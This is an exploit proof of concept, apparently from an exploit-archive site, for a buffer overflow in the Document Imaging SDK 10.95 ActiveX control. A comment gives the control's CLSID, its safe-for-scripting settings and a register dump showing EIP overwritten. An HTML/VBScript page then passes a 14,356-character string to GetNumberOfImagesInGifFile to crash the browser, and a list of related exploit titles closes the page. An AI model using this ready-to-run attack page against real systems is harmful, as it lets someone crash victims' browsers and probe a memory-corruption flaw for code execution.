<!--
Document Imaging SDK Buffer Overflow Vulnerability
DoS Proof of concept
Author: r0ut3r
Mail : writ3r [at] gmail.com
-----------------------------
-Tested on WinXP Pro SP2
Version: 10.95
Vendor : Black Ice Software
Price : $999
File : biimgfrm.ocx
CLSID: {79956462-F148-497F-B247-DF35A095F80B}
DLL Settings:
RegKey Safe for Script: True
RegKey Safe for Init : True
KillBitSet : False
Register:
EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 00150168 -> 00000000
EDI 41414141
ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013EA20 -> 0013EAA4
ESP 0013E804 -> 0000021A
-----------------------------
-->
<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>
<script language='vbscript'>
Sub Boom
buff = String(14356, "A")
test.GetNumberOfImagesInGifFile buff
End Sub
</script>
<input type=button onclick=Boom() value='Boom?'>
【Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC】相关文章:
★ Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
★ Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit
★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
★ Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
★ EO Video 1.36 Local Heap Overflow DOS / PoC